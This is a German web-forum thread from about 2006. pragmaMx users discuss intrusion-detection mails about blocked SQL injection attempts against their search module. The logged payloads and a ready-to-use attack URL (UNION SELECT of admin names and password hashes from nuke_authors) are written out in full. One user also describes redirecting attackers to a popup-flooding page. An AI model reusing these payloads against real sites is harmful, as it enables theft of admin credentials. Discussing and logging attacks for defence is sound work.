Hack detected

[Gast]

Willkommen Gast. Bitte einloggen oder registrieren.

Einloggen mit Benutzername und Passwort

[fjuergens]

Hallo zusammen,
was ist das bzw. was fange ich damit an
Handelt sich um eine Domain von einer Freundin.
Sie hat folgende Mail erhalten:

12-04-2006 11:35:21 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[name] = Search 
_POST[query] = test 
_POST[type] = comments 
_POST[sid] = 0' UNION SELECT pwd FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          87.120.5.2
QUERY_STRING:         name=Search
REQUEST_URI:          /welt/modules.php?name=Search
REMOTE_PORT:          44343
REMOTE_HOST:         
HTTP_REFERER:         
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7
HTTP_X_FORWARDED_FOR: 87.120.87.178

siteadress: http://www.gabyswelt.info/welt

Danke im voraus

[RiotheRat]

Es hat jemand verrsucht über die Suche das System Deiner Freundin zu hacken. Er wollte gerne das Adminpasswort wissen  Das System hat den Hack erkannt, geblockt und als Resultat diese Mail rausgehauen um darüber zu informieren dass ein gblockter Angriff  stattgefundfen hat.

Du und die Freundin müssen sich also keinen Kopf machen ... ein  sinnloser, geblockter Hack ...

RtR

[fjuergens]

Hallo Rio,
Danke für die schnelle Antwort

[Puschel]

Hatte heute ähnlichen Fall und wunderte mich auch erst über die Mail. Aber gibt ja zum Glück die Suche hier .
Das hier stand drin:

19-04-2006 00:24:49 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories 
_GET[topic] =   
_GET[category] = 0 
_GET[days] = 0 
_GET[sid] = 0 
_GET[name] = Search 
_GET[query] = p0gg0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.96.245.201
QUERY_STRING:         type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=p0gg0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          2913
REMOTE_HOST:         
HTTP_REFERER:         http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
HTTP_X_FORWARDED_FOR:




Ist die "REMOTE_ADDR" die IP von dem, der den Hack versucht hat? Würde es dann was bringen, diese zu sperren? Oder kann man sich das im Prinzip sparen, da er im Pragma auch beim nächsten Mal keinen Erfolg haben wird?

[Andi]

Hi

die ip zu sperren bringt nix, beim nächsten mal hat der ne andere....

Der "Hacker" war ein ahnungsloser doofer scriptkiddie, der den Exploit von waraxe's advisory 1:1 übernommen hat. Manche meinen, wenn sie irgendwo was aufschnappen können sie gleich die halbe Welt hacken....

[waraxe-2006-SA#046] - Critical sql injection in phpNuke 7.5-7.8
http://www.waraxe.us/advisory-46.html

[NeMeSiSX2LC]

Gibt aber leider auch durchaus Seiten wo dieser "hack" greift...

Also keine MX, die armen Nuker....

[Andi]

Trotzdem doofer Scriptkiddie, der nichtmal sieht ob er phpnuke oder sonstwas vor sich hat... 
Bekomme die mails ja fast immer in Kopie und zu 95% sind die Angriffe die Standardtexte per cut & paste in die Browserzeile gehackt, oder diese idiotischen Standardhackerformulare wo alle möglichen Nuke-Hacks interaktiv aufgelistet sind. Die Dummköppe machen sich nichtmal die Mühe den richtigen Tabellenprefix zu ermitteln, was ja in Nuke kein Problem ist....

[Puschel]

Naja, aber scheinbar lernt er nicht aus seinen "Fehlern"... Da eben wieder eine Mail kam, vermute ich mal, da ist der gleiche am Werk:

20-04-2006 18:41:25 [Union] Hack detected (0)
user: Gast
admin: Gast
request:
_GET[type] = stories 
_GET[topic] =   
_GET[category] = 0 
_GET[days] = 0 
_GET[sid] = 0 
_GET[name] = Search 
_GET[query] = g0nsee%') UNION ALL SELECT 1,2,aid,pwd,5,6,7,8,9,10 FROM nuke_authors/*
Serverinfo:
REMOTE_ADDR:          85.97.108.5
QUERY_STRING:         type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REQUEST_URI:          /modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNION+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*
REMOTE_PORT:          4101
REMOTE_HOST:         
HTTP_REFERER:         http://www.gamezcheck.de/modules.php?name=Search
HTTP_USER_AGENT:      Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.2) Gecko/20060308 Firefox/1.5.0.2
HTTP_X_FORWARDED_FOR:


siteadress: http://www.gamezcheck.de




Sieht dem letzten Versuch doch sehr ähnlich

[Andi]

Wie bereits gesagt, diese mails bekomme ich (bzw. das ganze team) zu dutzenden am Tag.
Vergesst es einfach, den Schitt braucht ihr hier nicht zu posten, sonst haben wir bald das Forum damit voll....

Jeder Depp kann das sein, er braucht deine Seite einfach nur mit dieser URL aufrufen:

http://www.deineseite.tld/modules.php?type=stories&topic=&category=0&days=0&sid=0&name=Search&query=g0nsee%25%27%29+UNI0N+ALL+SELECT+1%2C2%2Caid%2Cpwd%2C5%2C6%2C7%2C8%2C9%2C10+FROM+nuke_authors%2F*

Wenn sich das häuft und du die Benachrichtigung nicht erhalten willst, so kannst du das in der /includes/detection/config.php abschalten.

Code: [Select]  

// mailadressen, wo die Detection hinversendet werden soll
// weitere Adressen können nach dem gleichen Schema zugefügt werden
// um kein Mail zu versenden, einfach diese Zeilen auskommentieren oder löschen
$conf['sendmail'][] = $GLOBALS['adminmail']; // Standardadminmailadresse, kann auch mit anderem Wert belegt werden :-))
$conf['sendmail'][] = 'ids@pragmamx.org';    // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll

Ich vermute mal, dass die meisten Idioten, die das probieren, garnicht wissen, was sie als Ergebnis bekommen könnten. Selbst wenn, dann bekämen die nur die Adminpasswörter als md5-hash. Das nützt denen bei pragmaMx auch nix, weil die damit keinen Admincookie fälschen können. Den gibt es im pragmaMx nämlich garnicht...

[Okimen]

Hallo Ihr lieben,
ist aber trotz allem sehr schön und sehr beruhigend dies zu lesen. Vor allem wenn man wie ich bzw. meine damals noch php-nuke seiten zweimal gehackt wurden.
Das ganze ist jetzt ca.3 Wochen her, und wirklich verdammt beruhigend. Macht mut neue und weitere Sachen zu probieren, ohne das man Angst haben muss, das irgendein Hacker oder Möchtegernhacker einem das wieder zerstört.

Danke für diese Beruhigung!

VG Dirk

[Andi]

Hi

nunja, das bedeutet aber keine 100%ige Sicherheit, gelle 

[Okimen]

Hallo Andi,
gut, aber was ist heute schon 100%ig? Oft reichen ja 98%

VG Dirk

[--helmi-]

Hi Andi..

Zur Zeit häufen sich diese Atacken wieder bei mir.. 
Und so überlege ich, ob es nicht möglich wäre, diese Jungs auch mal etwas zu ärgern..
oder zumindest zu verwirren: Wäre es möglich bei solchen Angriffen eine bestimmte Seite zu öffnen..?
Meinetwegen in der Art von:  Wir kennen Dich: Hier ist deine IP, dein OS, dein Browser, dein "C:\ - Verzeichnis" (soll ja mit JS ganz einfach gehen..!?) ..   Jetzt wird Deine Pladde formatiert.. usw..    8)

Wäre sowas (mit wenig Aufwand) möglich..?   

---

[Andi]

Moin

meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Wenn ja, kannst du einfach auf eine andere Seite umleiten, indem du die /includes/detection/config.php anpasst:

Code: [Select]  

// Weiterleiten auf andere Seite oder leerlassen um mit Fehlermeldung direkt abzubrechen
$conf['redirect'] = 'http://www.google.de/'; #

Standardmässig wird da auf die index.php umgeleitet, da kannst du aber jede x-beliebige Seite einsetzen.
Heheeee, z.B. auf diesen Thread

[--helmi-]

MoinMoin Andi 

Moin
meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Naja.. manche Kiddies wirds vielleicht beieindrucken..? 
Sind ja IMHO nicht alles "Profis" / Freaks..   Denke (hoffe) mal das der Großteil der Atacken von eher unbedarften Kiddies kommt, die irgendwelche Instant-Scripte alle mal der Reihe nach anklicken / probieren.. 

Danke mal für Deinen Code-Tipp! werds mal verwurschteln!
Wenn  dann irgendwelche Häufungen von Panikatacken bei den Kiddies bekannt werden, geb ich hier nochmal Bescheid.. *lol* 

[Okimen]

Hallo,
gut "Profis" würde das wohl kaum erschrecken, aber bei den "Kiddis" die da meinen sie könnten die ganze Welt hacken, stelle ich mir das schon komisch vor!

Viel Spaß!

VG Dirk

[NeMeSiSX2LC]

Wenn ich diese Meldung so sehe dann ist das doch ne Aktuelle von **** Und es gibt echt Seiten  wo das geht (Nuke) Bloss bissel ahnung müsste derjenige doch haben. Sonst kann er mit dem Resultat nix anfangen

[Andi]

Klar funktioniert das in phpNuke

Aber etliche Leute haben immer noch nicht kapiert, dass pragmaMx mit nuke genauso viel gemeinsam hat, wie postNuke. Ob die postNuke Jungs auch so unter dieser beschissenen Erblast leiden müssen....

[m-t]

meinst du wirklich, dass du mit solchen Spielereien die Jungs beeindrucken kannst?

Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay

weitergeleitet,

Vorsicht lieber nicht aufrufen! Es öffnen sich ca. 1800 Fenster. Den PC kannst dann neu starten da kommt kein PopUp Blocker mit :-)

Seitdem ich das drinhatte haben sich die Hackversuche in Minutenabständen etwas verringert, beeindrucken kann ich niemand damit das is klar. Aber ein bischen Schadenfreude ist schon dabei.

[Apfelkomplott]

Also ich hab bei Nuke immer auf hxxp://www.adatepe.de/ebay

Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)

[m-t]

Also, da würde ich doch eher die URL eines Werbepartners eintragen, der per Click/View bezahlt ... ;-)

Das war noch bei Nuke, aber die Idee ist toll :-)

[schnikemike]

ist das  eigendlich noch ein überbleibsel oder beabsichtigt?



$conf['sendmail'][] = 'ids@pragmamx.org'; // Falls das Entwicklerteam ebenfalls benachrichtigt werden soll



Da kommen ja dann ziug solcher mails bei euch an.

Lg

[der_luecke]

Jupp, wir wollen doch wissen, was versucht wird

und jupp es ist eine Menge los, SPAM ist lächerlich dagegen